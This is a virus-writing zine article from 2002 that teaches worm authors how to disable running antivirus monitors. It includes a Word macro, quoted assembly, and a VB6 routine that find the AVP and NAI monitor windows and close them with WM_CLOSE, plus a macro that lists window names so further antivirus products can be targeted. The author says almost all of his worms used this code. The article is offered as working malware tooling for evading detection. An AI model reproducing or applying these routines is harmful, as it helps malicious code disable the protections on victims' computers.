When the going gets weird the weird turn pro

last article	table of contents	next article

Strange Article - Turning off av monitors in Visual Basic 6 by Alco paul

You planned to write a worm in Visual Basic 6, attached the melissa code in your project, made some personalized payload and compiled your code...
Then a message from your antivirus software pops out...

"File 1 is a New Worm"

Shitty... Almost all the worms that I made went through this morbid reality...
To make my coding smoothly, I had to turn off my av whenever I compile and alpha-test my project...
An idea suddenly popped out.. Isn't it cooler if my worm can turn off an av monitor, and do its thing without detection?
I researched...

I saw an article by LiteSYS/XAKER - in coderz #2 regarding turning off av monitors in vb...
The routine uses MS-Word... Here's a sample used in the article..

-------------------------
Sub nohaybillete()
On Error Resume Next

For I = 1 to Tasks.Count
If ( Tasks.Item(I).Name = "AVP Monitor" ) Then Tasks.Item(I).Close
Next

End Sub
-------------------------

This, when run in MS-Word VB Editor, will produce our desired result...
It will close the running AVP monitor and whalla, the computer is "clean"..
But we want the routine to be attached in a vb executable...
And what if the infected computer doesn't contain MS Office... LiteSYS/XAKER provided an option...

Quoted:

"There's another method... what about dropping a simple executable
(written in assembly ofcoz) that can use directly the FindWindowA and PostMessageA APIs?
fully compatible with every windoze version and you don't have to relay in that untrustable Word object...

I must thank Benny/29A for his AV monitor deactivation tute that appeared in 29A #4, because it was my inspiration to do this...

Ok, you must use your Debug script or your Chr stuff to write to the file. Look at the assembly code first, it kills both AVP and NAI:

--------------------------------
.386
.MODEL FLAT, STDCALL
LOCALS
JUMPS

EXTRN ExitProcess:PROC
EXTRN FindWindowA:PROC
EXTRN PostMessageA:PROC

.DATA
DD ?
.CODE

RETRO:
MOV EAX, OFFSET Titulo_NAI
CALL MATA_MONI

MOV EAX, OFFSET Titulo_AVP
CALL MATA_MONI
 
 
PUSH 0
CALL ExitProcess

Titulo_AVP db "AVP Monitor", 00h
Titulo_NAI db "NAI_VS_STAT", 00h

MATA_MONI PROC NEAR

PUSH EAX
PUSH 0
CALL FindWindowA
JNZ SI_MATARAS

RET

SI_MATARAS:
PUSH 0
PUSH 0
PUSH 12h
PUSH EAX
CALL PostMessageA

RET
MATA_MONI ENDP

END RETRO --------------------------------

Assemble, Link it and create your script or your Chrs...
i don't like the debug script idea because it's too slooooow so i prefer put it on your virus/worm and you're all set, look at this example:

--------------------------------"

Self-explanatory...
This routine will cause a lot of disk space and it's not efficient when executed, meaning it'll be a slow routine..
LiteSYS/XAKER accepted this reality..

Quoted:

"This is not a fast and stealthy way so it's better to use some Chrs in your code instead of the debug script to do it,
but i am to lazy to write some code so you may find the way..."

I researched on FindWindowA and PostMessageA Apis.. Referred to my API text Viewer..

--------------------------------------------------------

    Private Declare Function FindWindow Lib "user32" _
      Alias "FindWindowA" _
      (ByVal lpClassName As String, _
      ByVal lpWindowName As String) As Long

    Private Declare Function PostMessage Lib "user32" _
      Alias "PostMessageA" _
      (ByVal hwnd As Long, _
      ByVal wMsg As Long, _
      ByVal wParam As Long, _
      ByVal lParam As Long) As Long

    Const WM_CLOSE = &H10 <----important constant

----------------------------------------------------------

Then I encountered an article from Microsoft...

"HOWTO: Programmatically close a separate Application (Q176391)"

Hehehehehe... Now let's concentrate....

Description of the useful APIs from the article..

"To programmatically close a single instance of a Windows program, you begin by getting the handle to the Window that you want to close with the FindWindow function.
The FindWindow API function returns the handle of a top-level window whose class name and window name matches the string parameters.
This function returns the handle of the window as a long value if it is successful and a null if it fails. To use this function, you must supply two parameters:
 
 
lpClassName - A pointer to a null-terminated string that specifies the class name or is an atom that identifies the class-name string.
In this application, you can pass vbNullString.
 
 
lpWindowName - A pointer to a null-terminated string that specifies the window name (the window's title).
 
 
Use the handle to send a message to close the window with the PostMessage API.
The PostMessage API function sends a message to an application message queue and returns a value immediately.
This function returns a non-zero value if the function is successful and zero if the function fails. To use this function, you must specify four parameters:

hWnd - The handle of the window you want to close. This long value is available as the result of the FindWindow function.
 
 
uInt - The message to post to the message queue. In this application, you would use the WM_CLOSE message.
 
 
wParam - The first message parameter. For this message, you should pass a null value.
 
 
lParam - The second message parameter. For this message, you should pass a null value. "

Let us convert the description to a code...

-------------------------------------------------
Option Explicit
Private Declare Function FindWindow Lib "user32" _
     Alias "FindWindowA" _
     (ByVal lpClassName As String, _
     ByVal lpWindowName As String) As Long

Private Declare Function PostMessage Lib "user32" _
     Alias "PostMessageA" _
     (ByVal hwnd As Long, _
     ByVal wMsg As Long, _
     ByVal wParam As Long, _
     ByVal lParam As Long) As Long

Const WM_CLOSE = &H10
Dim a As Long
Dim b As Long

-------------------------------
add-ons
Dim c As Long
Dim d As Long
....
-------------------------------

a = FindWindow(vbNullString, "AVP Monitor")
b = PostMessage(a, WM_CLOSE, vbNull, vbNull)

-------------------------------
add-ons
c = FindWindow(vbNullString, "monitor name")
d = PostMessage(c, WM_CLOSE, vbNull, vbNull)
....
--------------------------------------------------

This is a short but powerful code...
When attached to a vb project and run, it will programmatically close AVP monitor (when you have one running in your pc)... :)
This code was used by almost all the worms that I've produced.. (from the AVP-tagged Alcaul to ....)...

--------------------
Finding our targets
--------------------

So now we know how to close a running window using the previous code laid....
Now we have to find our target av monitors...

Use MS-Word VB Editor

--------------
Sub search()
On Error Resume Next
For I = 1 to Tasks.Count
Windowname = Tasks.Item(I).Name
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\avlist.txt", True)
a.WriteLine Windowname
Next
a.Close
End Sub
--------------

When run, this will produce avlist.txt in c:\ which contains the resident/running window names of programs...

Tip : If you want to identify all the target av monitors, first you have to download trial copies of antivirus softwares from www.download.com or www.tucows.com or from the av site...
Install one, then search for the window name of the monitor, then uninstall after you identified it...
Only run the av software, close all running apps.
..Don't spare the apps in systray from closure...
If you don't, you'll get a long list of resident/running apps in avlist.txt..
 
 
That's all.... Hope this helps...

alcopaul

1/18/2k2